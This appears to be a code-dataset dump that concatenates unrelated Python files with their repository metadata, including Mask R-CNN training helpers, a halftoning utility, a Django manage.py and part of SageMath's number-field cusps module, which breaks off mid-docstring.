box_uuid = "{2f07cea2-4c31-44fa-8e96-31aada3ccaa3}"
os_type = "RedHat_64"
version = "1.12-linux"
cpu_number = str(flavor.vcpus)
memory_size = str(flavor.ram)
qcow_path = temp_location + name + '.qcow2'
rules = nova.get_security_rules(nova_instance)
if len(app.config['PORT_RANGE']) < len(rules):
raise Exception("Not enough ports available for security groups are available")
my_file.add_machine(image_name, file_reference, disk_capacity, diskId, box_id,
machine_name, os_type, cpu_number, memory_size, version,
box_uuid, nova_instance.networks, rules)
image_id = nova.create_image_from_instance(instance_id, nova_instance.name)
save_image(image_id, qcow_path)
glance.remove_image(image_id)
subprocess.call(['qemu-img', 'convert', '-f', 'qcow2', '-O', 'vmdk', '-o', 'subformat=streamOptimized',
qcow_path, ova_path + "/" + name + '.vmdk'])
os.remove(qcow_path)
LOG.info("Image is downloaded as " + name + ".qcow2")
order_list.append(name + ".vmdk")
number += 1
my_file.get_xml_file(ova_path + "/" + output_folder + '.ovf')
order_list[0] = output_folder + '.ovf'
make_tarfile(ova_path, order_list)
LOG.info("File is saved as " + output_folder + " file")
os.rmdir(ova_path)
return str({"Ok"})
| 39.803571 | 115 | 0.598923 |
acfa75f1d02a08f6abb226806abc2bdf6034d5ad | 90 | py | Python | github_activity/__init__.py | consideRatio/github-activity | 29e04df5fb473c4761cba500dbbc81e263c69df9 | [
"BSD-3-Clause"
] | null | null | null | github_activity/__init__.py | consideRatio/github-activity | 29e04df5fb473c4761cba500dbbc81e263c69df9 | [
"BSD-3-Clause"
] | null | null | null | github_activity/__init__.py | consideRatio/github-activity | 29e04df5fb473c4761cba500dbbc81e263c69df9 | [
"BSD-3-Clause"
] | null | null | null | __version__ = "0.1.0dev0"
from .github_activity import get_activity, generate_activity_md | 30 | 63 | 0.833333 |
acfa7752ccd4129363d18ee649b2652f1e6ada9d | 4,742 | py | Python | models/models.py | alejgo06/image_detector_backend | 03de0815db8fef79075f1baf64395c67725f0d02 | [
"MIT"
] | null | null | null | models/models.py | alejgo06/image_detector_backend | 03de0815db8fef79075f1baf64395c67725f0d02 | [
"MIT"
] | null | null | null | models/models.py | alejgo06/image_detector_backend | 03de0815db8fef79075f1baf64395c67725f0d02 | [
"MIT"
] | null | null | null | import torchvision
from torchvision.models.detection.faster_rcnn import FastRCNNPredictor
from torchvision.models.detection.mask_rcnn import MaskRCNNPredictor
import math
import sys
import torch
from coco_utils import get_coco_api_from_dataset
from coco_eval import CocoEvaluator
def get_instance_segmentation_model(num_classes):
# load an instance segmentation model pre-trained on COCO
model = torchvision.models.detection.maskrcnn_resnet50_fpn(pretrained=True)
# get the number of input features for the classifier
in_features = model.roi_heads.box_predictor.cls_score.in_features
# replace the pre-trained head with a new one
model.roi_heads.box_predictor = FastRCNNPredictor(in_features, num_classes)
# now get the number of input features for the mask classifier
in_features_mask = model.roi_heads.mask_predictor.conv5_mask.in_channels
hidden_layer = 256
# and replace the mask predictor with a new one
model.roi_heads.mask_predictor = MaskRCNNPredictor(in_features_mask,
hidden_layer,
num_classes)
return model
def train_one_epoch(model, optimizer, data_loader, device, epoch, print_freq):
model.train()
metric_logger = utils.MetricLogger(delimiter=" ")
metric_logger.add_meter('lr', utils.SmoothedValue(window_size=1, fmt='{value:.6f}'))
header = 'Epoch: [{}]'.format(epoch)
lr_scheduler = None
if epoch == 0:
warmup_factor = 1. / 1000
warmup_iters = min(1000, len(data_loader) - 1)
lr_scheduler = utils.warmup_lr_scheduler(optimizer, warmup_iters, warmup_factor)
for images, targets in metric_logger.log_every(data_loader, print_freq, header):
images = list(image.to(device) for image in images)
targets = [{k: v.to(device) for k, v in t.items()} for t in targets]
loss_dict = model(images, targets)
losses = sum(loss for loss in loss_dict.values())
# reduce losses over all GPUs for logging purposes
loss_dict_reduced = utils.reduce_dict(loss_dict)
losses_reduced = sum(loss for loss in loss_dict_reduced.values())
loss_value = losses_reduced.item()
if not math.isfinite(loss_value):
print("Loss is {}, stopping training".format(loss_value))
print(loss_dict_reduced)
sys.exit(1)
optimizer.zero_grad()
losses.backward()
optimizer.step()
if lr_scheduler is not None:
lr_scheduler.step()
metric_logger.update(loss=losses_reduced, **loss_dict_reduced)
metric_logger.update(lr=optimizer.param_groups[0]["lr"])
return metric_logger
def evaluate(model, data_loader, device):
n_threads = torch.get_num_threads()
# FIXME remove this and make paste_masks_in_image run on the GPU
torch.set_num_threads(1)
cpu_device = torch.device("cpu")
model.eval()
metric_logger = utils.MetricLogger(delimiter=" ")
header = 'Test:'
coco = get_coco_api_from_dataset(data_loader.dataset)
iou_types = _get_iou_types(model)
coco_evaluator = CocoEvaluator(coco, iou_types)
for image, targets in metric_logger.log_every(data_loader, 100, header):
image = list(img.to(device) for img in image)
targets = [{k: v.to(device) for k, v in t.items()} for t in targets]
torch.cuda.synchronize()
model_time = time.time()
outputs = model(image)
outputs = [{k: v.to(cpu_device) for k, v in t.items()} for t in outputs]
model_time = time.time() - model_time
res = {target["image_id"].item(): output for target, output in zip(targets, outputs)}
evaluator_time = time.time()
coco_evaluator.update(res)
evaluator_time = time.time() - evaluator_time
metric_logger.update(model_time=model_time, evaluator_time=evaluator_time)
# gather the stats from all processes
metric_logger.synchronize_between_processes()
print("Averaged stats:", metric_logger)
coco_evaluator.synchronize_between_processes()
# accumulate predictions from all images
coco_evaluator.accumulate()
coco_evaluator.summarize()
torch.set_num_threads(n_threads)
return coco_evaluator
def _get_iou_types(model):
model_without_ddp = model
if isinstance(model, torch.nn.parallel.DistributedDataParallel):
model_without_ddp = model.module
iou_types = ["bbox"]
if isinstance(model_without_ddp, torchvision.models.detection.MaskRCNN):
iou_types.append("segm")
if isinstance(model_without_ddp, torchvision.models.detection.KeypointRCNN):
iou_types.append("keypoints")
return iou_types | 37.046875 | 93 | 0.697385 |
acfa78862bc3cc4f93ad76ba1be5b9e8babafa7e | 668 | py | Python | listen360/manage.py | zkan/listen360 | effaa7491cfc858cc4c944b6a4557bd284167cc3 | [
"MIT"
] | 5 | 2022-02-19T09:44:32.000Z | 2022-03-19T14:56:57.000Z | listen360/manage.py | zkan/listen360 | effaa7491cfc858cc4c944b6a4557bd284167cc3 | [
"MIT"
] | 4 | 2021-12-10T22:40:33.000Z | 2021-12-20T18:08:07.000Z | listen360/manage.py | zkan/listen360 | effaa7491cfc858cc4c944b6a4557bd284167cc3 | [
"MIT"
] | 2 | 2021-11-13T16:00:13.000Z | 2021-11-14T15:39:32.000Z | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
"""Run administrative tasks."""
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'config.settings.local')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
| 29.043478 | 76 | 0.679641 |
acfa78cbe4c59ab5e95f26b6c085cde0e33b148a | 3,353 | py | Python | utils/halftone.py | Nikronic/Deep-Halftoning | 9564c592abf139ccab2791c1dbb354505edab5f9 | [
"MIT"
] | null | null | null | utils/halftone.py | Nikronic/Deep-Halftoning | 9564c592abf139ccab2791c1dbb354505edab5f9 | [
"MIT"
] | 1 | 2021-11-07T12:13:38.000Z | 2021-11-07T12:13:38.000Z | utils/halftone.py | Nikronic/Deep-Halftoning | 9564c592abf139ccab2791c1dbb354505edab5f9 | [
"MIT"
] | null | null | null | # %% libraries
import PIL.Image as Image
import numpy.matlib
import numpy as np
import random
import math
# %% functions
dithMat =[
# 8x8 sprial
[[62, 58, 45, 41, 37, 49, 53, 61],
[54, 34, 25, 21, 17, 29, 33, 57],
[ 50, 30, 13, 9, 5, 12, 24, 44],
[ 38, 18, 6, 1, 0, 8, 20, 40],
[42, 22, 10, 2, 3, 4, 16, 36],
[46, 26, 14, 7, 11, 15, 28, 48],
[59, 35, 31, 19, 23, 27, 32, 52],
[ 63, 55, 51, 39, 43, 47, 56, 60]],
# 8x8 dispresed
[[ 1, 30, 8, 28, 2, 29, 7, 27],
[ 17, 9, 24, 16, 18, 10, 23, 15],
[ 5, 25, 3, 32, 6, 26, 4, 31],
[ 21, 13, 19, 11, 22, 14, 20, 12],
[ 2, 29, 7, 27, 1, 30, 8, 28],
[ 18, 10, 23, 15, 17, 9, 24, 16],
[ 6, 26, 4, 31, 5, 25, 3, 32],
[ 22, 14, 20, 12, 21, 13, 19, 11]],
# 8X8 octa_dot
[[ 45, 17, 25, 37, 47, 19, 27, 39],
[ 49, 1, 9, 57, 51, 3, 11, 59],
[ 29, 33, 41, 21, 31, 35, 43, 23],
[ 13, 61, 53, 5, 15, 63, 55, 7],
[ 48, 20, 28, 40, 46, 18, 26, 38],
[ 52, 4, 12, 60, 50, 2, 10, 58],
[ 32, 36, 44, 24, 30, 34, 42, 22],
[ 16, 64, 56, 8, 14, 62, 54, 6]],
# 5x5 diamond
[[ 5, 118, 160, 58, 17],
[ 48, 201, 232, 170, 99],
[ 129, 211, 252, 242, 150],
[ 89, 191, 221, 181, 68],
[ 38, 78, 140, 108, 27]],
# 5x5 clockwise sprial
[[3, 10, 16, 11, 4],
[ 9, 20, 21, 17, 12],
[ 15, 24, 25, 22, 13],
[ 8, 19, 23, 18, 5],
[ 2, 7, 14, 6, 1]],
# 4x4 ordered
[[ 5, 9, 6, 10],
[ 13, 1, 14, 2],
[ 7 ,11, 4, 8],
[ 15, 3, 12, 0]],
]
def get_resDmat(channel_size,dithMat):
newSzY,newSzX = channel_size[1],channel_size[0]
minDmat = min(min(dithMat))
maxDmat = max(max(dithMat))
nbOfIntervals = maxDmat-minDmat+2
singleInterval = 255/nbOfIntervals
scaledDithMat = np.multiply(np.subtract(dithMat , minDmat+1),singleInterval)
scaledDithMat = scaledDithMat.astype(int)
dmatSzY, dmatSzX = len(scaledDithMat),len(scaledDithMat[0])
nX = math.ceil(newSzX / dmatSzX)
nY = math.ceil(newSzY / dmatSzY)
resDmat = np.matlib.repmat(scaledDithMat.astype(int), nY, nX)[:newSzY,:newSzX]
return resDmat
def generate_halftone(im):
cmyk_im = im.convert('CMYK')
dithMat_sample = dithMat[random.randint(0, len(dithMat) - 1)]
cmyk = cmyk_im.split()
angles = [[ 15, 45, 0, 75],
[ 45, 15, 0, 75],
[ 0, 0, 0, 0]]
angles = angles[random.randint(0, len(angles) - 1)]
if cmyk[0] == cmyk[1] == cmyk[2] :
angles = angles[:1]*4
dots = []
for x,i in enumerate(cmyk):
channel_Rotation = i.rotate(angles[x], expand=1)
channel = np.asarray(channel_Rotation) > get_resDmat(channel_Rotation.size,dithMat_sample)
channel = Image.fromarray((channel * 255).astype('uint8')).convert('L').rotate(-angles[x], expand=1)
# https://stackoverflow.com/questions/27622834/write-numpy-ndarray-to-image
# reason of casting to 'uint8'
w,h = channel.size
im_x,im_y = i.size
x1 = (w-im_x)/2
y1 = (h-im_y)/2
channel = channel.crop((x1, y1, x1+im_x, y1+im_y))
dots.append(channel)
halftoned_im = Image.merge('CMYK',dots)
return halftoned_im.convert('RGB')
# %% test
# im = Image.open('data/Places365_val_00000001.jpg')
# imh = generate_halftone(im)
# imh.show()
| 31.336449 | 108 | 0.532657 |
acfa790d44cfb9df77894e0a3bd7167767e656d1 | 674 | py | Python | rls/resolvers.py | chesnovsky/rls-sdk | e6eccb83d13cbc9e2756634e569aadb41c175d5b | [
"MIT"
] | 7 | 2017-09-08T02:15:52.000Z | 2020-04-02T07:16:19.000Z | rls/resolvers.py | chesnovsky/rls-sdk | e6eccb83d13cbc9e2756634e569aadb41c175d5b | [
"MIT"
] | 16 | 2017-07-26T15:01:33.000Z | 2018-12-10T20:45:47.000Z | rls/resolvers.py | chesnovsky/rls-sdk | e6eccb83d13cbc9e2756634e569aadb41c175d5b | [
"MIT"
] | 5 | 2018-10-10T18:37:50.000Z | 2020-04-06T21:28:03.000Z | from .api import Api
from .exceptions import MissingParam
class Resolver:
def __init__(self):
self.url = ''
self.method = ''
self.api = Api()
def setup(self, api_map=None, **kwargs):
url = api_map['url']
method = api_map['method']
try:
url = url.format(**kwargs)
except KeyError as param:
raise MissingParam(param=param)
self.method = method
self.url = url
def resolve(self, api_key, api_map=None, json=None, **kwargs):
self.setup(api_map=api_map, **kwargs)
return self.api.request(url=self.url, method=self.method, api_key=api_key, json=json)
| 25.923077 | 93 | 0.596439 |
acfa7a5ebb7c5a93edbcf71c907d757be4c566f0 | 40,766 | py | Python | src/sage/modular/cusps_nf.py | UCD4IDS/sage | 43474c96d533fd396fe29fe0782d44dc7f5164f7 | [
"BSL-1.0"
] | 1,742 | 2015-01-04T07:06:13.000Z | 2022-03-30T11:32:52.000Z | src/sage/modular/cusps_nf.py | UCD4IDS/sage | 43474c96d533fd396fe29fe0782d44dc7f5164f7 | [
"BSL-1.0"
] | 66 | 2015-03-19T19:17:24.000Z | 2022-03-16T11:59:30.000Z | src/sage/modular/cusps_nf.py | UCD4IDS/sage | 43474c96d533fd396fe29fe0782d44dc7f5164f7 | [
"BSL-1.0"
] | 495 | 2015-01-10T10:23:18.000Z | 2022-03-24T22:06:11.000Z | r"""
The set `\mathbb{P}^1(K)` of cusps of a number field `K`
AUTHORS:
- Maite Aranes (2009): Initial version
EXAMPLES:
The space of cusps over a number field k::
sage: k.<a> = NumberField(x^2 + 5)
sage: kCusps = NFCusps(k); kCusps
Set of all cusps of Number Field in a with defining polynomial x^2 + 5
sage: kCusps is NFCusps(k)
True
Define a cusp over a number field::
sage: NFCusp(k, a, 2/(a+1))
Cusp [a - 5: 2] of Number Field in a with defining polynomial x^2 + 5
sage: kCusps((a,2))
Cusp [a: 2] of Number Field in a with defining polynomial x^2 + 5
sage: NFCusp(k,oo)
Cusp Infinity of Number Field in a with defining polynomial x^2 + 5
Different operations with cusps over a number field::
sage: alpha = NFCusp(k, 3, 1/a + 2); alpha
Cusp [a + 10: 7] of Number Field in a with defining polynomial x^2 + 5
sage: alpha.numerator()
a + 10
sage: alpha.denominator()
7
sage: alpha.ideal()
Fractional ideal (7, a + 3)
sage: M = alpha.ABmatrix(); M # random
[a + 10, 2*a + 6, 7, a + 5]
sage: NFCusp(k, oo).apply(M)
Cusp [a + 10: 7] of Number Field in a with defining polynomial x^2 + 5
Check Gamma0(N)-equivalence of cusps::
sage: N = k.ideal(3)
sage: alpha = NFCusp(k, 3, a + 1)
sage: beta = kCusps((2, a - 3))
sage: alpha.is_Gamma0_equivalent(beta, N)
True
Obtain transformation matrix for equivalent cusps::
sage: t, M = alpha.is_Gamma0_equivalent(beta, N, Transformation=True)
sage: M[2] in N
True
sage: M[0]*M[3] - M[1]*M[2] == 1
True
sage: alpha.apply(M) == beta
True
List representatives for Gamma_0(N) - equivalence classes of cusps::
sage: Gamma0_NFCusps(N)
[Cusp [0: 1] of Number Field in a with defining polynomial x^2 + 5,
Cusp [1: 3] of Number Field in a with defining polynomial x^2 + 5,
...]
"""
# ****************************************************************************
# Copyright (C) 2009, Maite Aranes <M.T.Aranes@warwick.ac.uk>
#
# Distributed under the terms of the GNU General Public License (GPL)
# https://www.gnu.org/licenses/
# ****************************************************************************
from sage.structure.parent import Parent
from sage.structure.element import Element, is_InfinityElement
from sage.structure.richcmp import richcmp, rich_to_bool
from sage.structure.unique_representation import UniqueRepresentation
from sage.misc.cachefunc import cached_method, cached_function
@cached_function
def list_of_representatives(N):
"""
Return a list of ideals, coprime to the ideal ``N``, representatives of
the ideal classes of the corresponding number field.
.. NOTE::
This list, used every time we check `\\Gamma_0(N)` - equivalence of
cusps, is cached.
INPUT:
- ``N`` -- an ideal of a number field.
OUTPUT:
A list of ideals coprime to the ideal ``N``, such that they are
representatives of all the ideal classes of the number field.
EXAMPLES::
sage: from sage.modular.cusps_nf import list_of_representatives
sage: k.<a> = NumberField(x^4 + 13*x^3 - 11)
sage: N = k.ideal(713, a + 208)
sage: L = list_of_representatives(N); L
(Fractional ideal (1),
Fractional ideal (47, a - 9),
Fractional ideal (53, a - 16))
"""
return NFCusps_ideal_reps_for_levelN(N)[0]
@cached_function
def NFCusps(number_field):
r"""
The set of cusps of a number field `K`, i.e. `\mathbb{P}^1(K)`.
INPUT:
- ``number_field`` -- a number field
OUTPUT:
The set of cusps over the given number field.
EXAMPLES::
sage: k.<a> = NumberField(x^2 + 5)
sage: kCusps = NFCusps(k); kCusps
Set of all cusps of Number Field in a with defining polynomial x^2 + 5
sage: kCusps is NFCusps(k)
True
Saving and loading works::
sage: loads(kCusps.dumps()) == kCusps
True
"""
return NFCuspsSpace(number_field)
# *************************************************************************
# NFCuspsSpace class *
# *************************************************************************
class NFCuspsSpace(UniqueRepresentation, Parent):
"""
The set of cusps of a number field. See ``NFCusps`` for full documentation.
EXAMPLES::
sage: k.<a> = NumberField(x^2 + 5)
sage: kCusps = NFCusps(k); kCusps
Set of all cusps of Number Field in a with defining polynomial x^2 + 5
"""
def __init__(self, number_field):
"""
See ``NFCusps`` for full documentation.
EXAMPLES::
sage: k.<a> = NumberField(x^3 + x^2 + 13)
sage: kCusps = NFCusps(k); kCusps
Set of all cusps of Number Field in a with defining polynomial x^3 + x^2 + 13
"""
self.__number_field = number_field
Parent.__init__(self, self)
def __eq__(self, right):
"""
Return equality only if right is the set of cusps for the same field.
EXAMPLES::
sage: k.<a> = NumberField(x^2 + 5)
sage: L.<a> = NumberField(x^2 + 23)
sage: kCusps = NFCusps(k); kCusps
Set of all cusps of Number Field in a with defining polynomial x^2 + 5
sage: LCusps = NFCusps(L); LCusps
Set of all cusps of Number Field in a with defining polynomial x^2 + 23
sage: kCusps == NFCusps(k)
True
sage: LCusps == NFCusps(L)
True
sage: LCusps == kCusps
False
"""
if not isinstance(right, NFCuspsSpace):
return False
return self.number_field() == right.number_field()
def __ne__(self, right):
"""
Check that ``self`` is not equal to ``right``.
EXAMPLES::
sage: k.<a> = NumberField(x^2 + 5)
sage: L.<a> = NumberField(x^2 + 23)
sage: kCusps = NFCusps(k); kCusps
Set of all cusps of Number Field in a with defining polynomial x^2 + 5
sage: LCusps = NFCusps(L); LCusps
Set of all cusps of Number Field in a with defining polynomial x^2 + 23
sage: kCusps != NFCusps(k)
False
sage: LCusps != NFCusps(L)
False
sage: LCusps != kCusps
True
"""
return not (self == right)
def _repr_(self):
"""
String representation of the set of cusps of a number field.
EXAMPLES::
sage: k.<a> = NumberField(x^2 + 2)
sage: kCusps = NFCusps(k)
sage: kCusps
Set of all cusps of Number Field in a with defining polynomial x^2 + 2
sage: kCusps._repr_()
'Set of all cusps of Number Field in a with defining polynomial x^2 + 2'
sage: kCusps.rename('Number Field Cusps'); kCusps
Number Field Cusps
sage: kCusps.rename(); kCusps
Set of all cusps of Number Field in a with defining polynomial x^2 + 2
"""
return "Set of all cusps of %s" % self.number_field()
def _latex_(self):
r"""
Return latex representation of self.
EXAMPLES::
sage: k.<a> = NumberField(x^2 + 5)
sage: kCusps = NFCusps(k)
sage: latex(kCusps) # indirect doctest
\mathbf{P}^1(\Bold{Q}[a]/(a^{2} + 5))
"""
return r"\mathbf{P}^1(%s)" % self.number_field()._latex_()
def __call__(self, x):
"""
Convert x into the set of cusps of a number field.
EXAMPLES::
sage: k.<a> = NumberField(x^2 + 5)
sage: kCusps = NFCusps(k)
sage: c = kCusps(a,2)
Traceback (most recent call last):
...
TypeError: ...__call__() takes 2 positional arguments but 3 were given
::
sage: c = kCusps((a,2)); c
Cusp [a: 2] of Number Field in a with defining polynomial x^2 + 5
sage: kCusps(2/a)
Cusp [-2*a: 5] of Number Field in a with defining polynomial x^2 + 5
sage: kCusps(oo)
Cusp Infinity of Number Field in a with defining polynomial x^2 + 5
"""
return NFCusp(self.number_field(), x, parent=self)
@cached_method
def zero(self):
"""
Return the zero cusp.
.. NOTE::
This method just exists to make some general algorithms work.
It is not intended that the returned cusp is an additive
neutral element.
EXAMPLES::
sage: k.<a> = NumberField(x^2 + 5)
sage: kCusps = NFCusps(k)
sage: kCusps.zero()
Cusp [0: 1] of Number Field in a with defining polynomial x^2 + 5
"""
return self(0)
def number_field(self):
"""
Return the number field that this set of cusps is attached to.
EXAMPLES::
sage: k.<a> = NumberField(x^2 + 1)
sage: kCusps = NFCusps(k)
sage: kCusps.number_field()
Number Field in a with defining polynomial x^2 + 1
"""
return self.__number_field
# *************************************************************************
# NFCusp class *
# *************************************************************************
class NFCusp(Element):
r"""
Create a number field cusp, i.e., an element of `\mathbb{P}^1(k)`.
A cusp on a number field is either an element of the field or infinity,
i.e., an element of the projective line over the number field. It is
stored as a pair (a,b), where a, b are integral elements of the number
field.
INPUT:
- ``number_field`` -- the number field over which the cusp is defined.
- ``a`` -- it can be a number field element (integral or not), or
a number field cusp.
- ``b`` -- (optional) when present, it must be either Infinity or
coercible to an element of the number field.
- ``lreps`` -- (optional) a list of chosen representatives for all the
ideal classes of the field. When given, the representative of the cusp
will be changed so its associated ideal is one of the ideals in the list.
OUTPUT:
``[a: b]`` -- a number field cusp.
EXAMPLES::
sage: k.<a> = NumberField(x^2 + 5)
sage: NFCusp(k, a, 2)
Cusp [a: 2] of Number Field in a with defining polynomial x^2 + 5
sage: NFCusp(k, (a,2))
Cusp [a: 2] of Number Field in a with defining polynomial x^2 + 5
sage: NFCusp(k, a, 2/(a+1))
Cusp [a - 5: 2] of Number Field in a with defining polynomial x^2 + 5
Cusp Infinity:
::
sage: NFCusp(k, 0)
Cusp [0: 1] of Number Field in a with defining polynomial x^2 + 5
sage: NFCusp(k, oo)
Cusp Infinity of Number Field in a with defining polynomial x^2 + 5
sage: NFCusp(k, 3*a, oo)
Cusp [0: 1] of Number Field in a with defining polynomial x^2 + 5
sage: NFCusp(k, a + 5, 0)
Cusp Infinity of Number Field in a with defining polynomial x^2 + 5
Saving and loading works:
::
sage: alpha = NFCusp(k, a, 2/(a+1))
sage: loads(dumps(alpha))==alpha
True
Some tests:
::
sage: I*I
-1
sage: NFCusp(k, I)
Traceback (most recent call last):
...
TypeError: unable to convert I to a cusp of the number field
::
sage: NFCusp(k, oo, oo)
Traceback (most recent call last):
...
TypeError: unable to convert (+Infinity, +Infinity) to a cusp of the number field
::
sage: NFCusp(k, 0, 0)
Traceback (most recent call last):
...
TypeError: unable to convert (0, 0) to a cusp of the number field
::
sage: NFCusp(k, "a + 2", a)
Cusp [-2*a + 5: 5] of Number Field in a with defining polynomial x^2 + 5
::
sage: NFCusp(k, NFCusp(k, oo))
Cusp Infinity of Number Field in a with defining polynomial x^2 + 5
sage: c = NFCusp(k, 3, 2*a)
sage: NFCusp(k, c, a + 1)
Cusp [-a - 5: 20] of Number Field in a with defining polynomial x^2 + 5
sage: L.<b> = NumberField(x^2 + 2)
sage: NFCusp(L, c)
Traceback (most recent call last):
...
ValueError: Cannot coerce cusps from one field to another
"""
def __init__(self, number_field, a, b=None, parent=None, lreps=None):
"""
Constructor of number field cusps. See ``NFCusp`` for full
documentation.
EXAMPLES::
sage: k.<a> = NumberField(x^2 + 1)
sage: c = NFCusp(k, 3, a+1); c
Cusp [3: a + 1] of Number Field in a with defining polynomial x^2 + 1
sage: c.parent()
Set of all cusps of Number Field in a with defining polynomial x^2 + 1
sage: kCusps = NFCusps(k)
sage: c.parent() is kCusps
True
"""
if parent is None:
parent = NFCusps(number_field)
Element.__init__(self, parent)
R = number_field.maximal_order()
if b is None:
if not a: # that is cusp "0"
self.__a = R.zero()
self.__b = R.one()
return
if isinstance(a, NFCusp):
if a.parent() == parent:
self.__a = R(a.__a)
self.__b = R(a.__b)
else:
raise ValueError("Cannot coerce cusps from one field to another")
elif a in R:
self.__a = R(a)
self.__b = R.one()
elif a in number_field:
self.__b = R(a.denominator())
self.__a = R(a * self.__b)
elif is_InfinityElement(a):
self.__a = R.one()
self.__b = R.zero()
elif isinstance(a, int):
self.__a = R(a)
self.__b = R.one()
elif isinstance(a, (tuple, list)):
if len(a) != 2:
raise TypeError("unable to convert %r to a cusp \
of the number field" % a)
if a[1].is_zero():
self.__a = R.one()
self.__b = R.zero()
elif a[0] in R and a[1] in R:
self.__a = R(a[0])
self.__b = R(a[1])
elif isinstance(a[0], NFCusp): # we know that a[1] is not zero
if a[1] == 1:
self.__a = a[0].__a
self.__b = a[0].__b
else:
r = a[0].__a / (a[0].__b * a[1])
self.__b = R(r.denominator())
self.__a = R(r * self.__b)
else:
try:
r = number_field(a[0] / a[1])
self.__b = R(r.denominator())
self.__a = R(r * self.__b)
except (ValueError, TypeError):
raise TypeError("unable to convert %r to a cusp "
"of the number field" % a)
else:
try:
r = number_field(a)
self.__b = R(r.denominator())
self.__a = R(r * self.__b)
except (ValueError, TypeError):
raise TypeError("unable to convert %r to a cusp "
"of the number field" % a)
else: # 'b' is given
if is_InfinityElement(b):
if is_InfinityElement(a) or (isinstance(a, NFCusp) and a.is_infinity()):
raise TypeError("unable to convert (%r, %r) "
"to a cusp of the number field" % (a, b))
self.__a = R.zero()
self.__b = R.one()
return
elif not b:
if not a:
raise TypeError("unable to convert (%r, %r) "
"to a cusp of the number field" % (a, b))
self.__a = R.one()
self.__b = R.zero()
return
if not a:
self.__a = R.zero()
self.__b = R.one()
return
if (b in R or isinstance(b, int)) and (a in R or isinstance(a, int)):
self.__a = R(a)
self.__b = R(b)
else:
if a in R or a in number_field:
r = a / b
elif is_InfinityElement(a):
self.__a = R.one()
self.__b = R.zero()
return
elif isinstance(a, NFCusp):
if a.is_infinity():
self.__a = R.one()
self.__b = R.zero()
return
r = a.__a / (a.__b * b)
elif isinstance(a, int):
r = R(a) / b
elif isinstance(a, (tuple, list)):
if len(a) != 2:
raise TypeError("unable to convert (%r, %r) \
to a cusp of the number field" % (a, b))
r = R(a[0]) / (R(a[1]) * b)
else:
try:
r = number_field(a) / b
except (ValueError, TypeError):
raise TypeError("unable to convert (%r, %r) \
to a cusp of the number field" % (a, b))
self.__b = R(r.denominator())
self.__a = R(r * self.__b)
if lreps is not None:
# Changes the representative of the cusp so the ideal associated
# to the cusp is one of the ideals of the given list lreps.
# Note: the trivial class is always represented by (1).
I = self.ideal()
for J in lreps:
if (J / I).is_principal():
newI = J
l = (newI / I).gens_reduced()[0]
self.__a = R(l * self.__a)
self.__b = R(l * self.__b)
def _repr_(self):
"""
String representation of this cusp.
EXAMPLES::
sage: k.<a> = NumberField(x^2 + 1)
sage: c = NFCusp(k, a, 2); c
Cusp [a: 2] of Number Field in a with defining polynomial x^2 + 1
sage: c._repr_()
'Cusp [a: 2] of Number Field in a with defining polynomial x^2 + 1'
sage: c.rename('[a:2](cusp of a number field)');c
[a:2](cusp of a number field)
sage: c.rename();c
Cusp [a: 2] of Number Field in a with defining polynomial x^2 + 1
"""
if self.__b.is_zero():
return "Cusp Infinity of %s" % self.parent().number_field()
else:
return "Cusp [%s: %s] of %s" % (self.__a, self.__b,
self.parent().number_field())
def number_field(self):
"""
Return the number field of definition of the cusp ``self``.
EXAMPLES::
sage: k.<a> = NumberField(x^2 + 2)
sage: alpha = NFCusp(k, 1, a + 1)
sage: alpha.number_field()
Number Field in a with defining polynomial x^2 + 2
"""
return self.parent().number_field()
def is_infinity(self):
"""
Return ``True`` if this is the cusp infinity.
EXAMPLES::
sage: k.<a> = NumberField(x^2 + 1)
sage: NFCusp(k, a, 2).is_infinity()
False
sage: NFCusp(k, 2, 0).is_infinity()
True
sage: NFCusp(k, oo).is_infinity()
True
"""
return self.__b == 0
def numerator(self):
"""
Return the numerator of the cusp ``self``.
EXAMPLES::
sage: k.<a> = NumberField(x^2 + 1)
sage: c = NFCusp(k, a, 2)
sage: c.numerator()
a
sage: d = NFCusp(k, 1, a)
sage: d.numerator()
1
sage: NFCusp(k, oo).numerator()
1
"""
return self.__a
def denominator(self):
"""
Return the denominator of the cusp ``self``.
EXAMPLES::
sage: k.<a> = NumberField(x^2 + 1)
sage: c = NFCusp(k, a, 2)
sage: c.denominator()
2
sage: d = NFCusp(k, 1, a + 1);d
Cusp [1: a + 1] of Number Field in a with defining polynomial x^2 + 1
sage: d.denominator()
a + 1
sage: NFCusp(k, oo).denominator()
0
"""
return self.__b
def _number_field_element_(self):
"""
Coerce to an element of the number field.
EXAMPLES::
sage: k.<a> = NumberField(x^2 + 2)
sage: NFCusp(k, a, 2)._number_field_element_()
1/2*a
sage: NFCusp(k, 1, a + 1)._number_field_element_()
-1/3*a + 1/3
"""
if self.__b.is_zero():
raise TypeError("%s is not an element of %s" % (self,
self.number_field()))
k = self.number_field()
return k(self.__a / self.__b)
def _ring_of_integers_element_(self):
"""
Coerce to an element of the ring of integers of the number field.
EXAMPLES::
sage: k.<a> = NumberField(x^2 + 2)
sage: NFCusp(k, a+1)._ring_of_integers_element_()
a + 1
sage: NFCusp(k, 1, a + 1)._ring_of_integers_element_()
Traceback (most recent call last):
...
TypeError: Cusp [1: a + 1] of Number Field in a with defining polynomial x^2 + 2 is not an integral element
"""
if self.__b.is_one():
return self.__a
R = self.number_field().ring_of_integers()
if self.__b.is_zero():
raise TypeError("%s is not an element of %s" % (self, R))
try:
return R(self.__a / self.__b)
except (ValueError, TypeError):
raise TypeError("%s is not an integral element" % self)
def _latex_(self):
r"""
Latex representation of this cusp.
EXAMPLES::
sage: k.<a> = NumberField(x^2 + 11)
sage: latex(NFCusp(k, 3*a, a + 1)) # indirect doctest
\[3 a: a + 1\]
sage: latex(NFCusp(k, 3*a, a + 1)) == NFCusp(k, 3*a, a + 1)._latex_()
True
sage: latex(NFCusp(k, oo))
\infty
"""
if self.__b.is_zero():
return "\\infty"
else:
return "\\[%s: %s\\]" % (self.__a._latex_(),
self.__b._latex_())
def _richcmp_(self, right, op):
"""
Compare the cusps ``self`` and ``right``.
Comparison is as for elements in the number field, except with
the cusp oo which is greater than everything but itself.
The ordering in comparison is only really meaningful for infinity.
EXAMPLES::
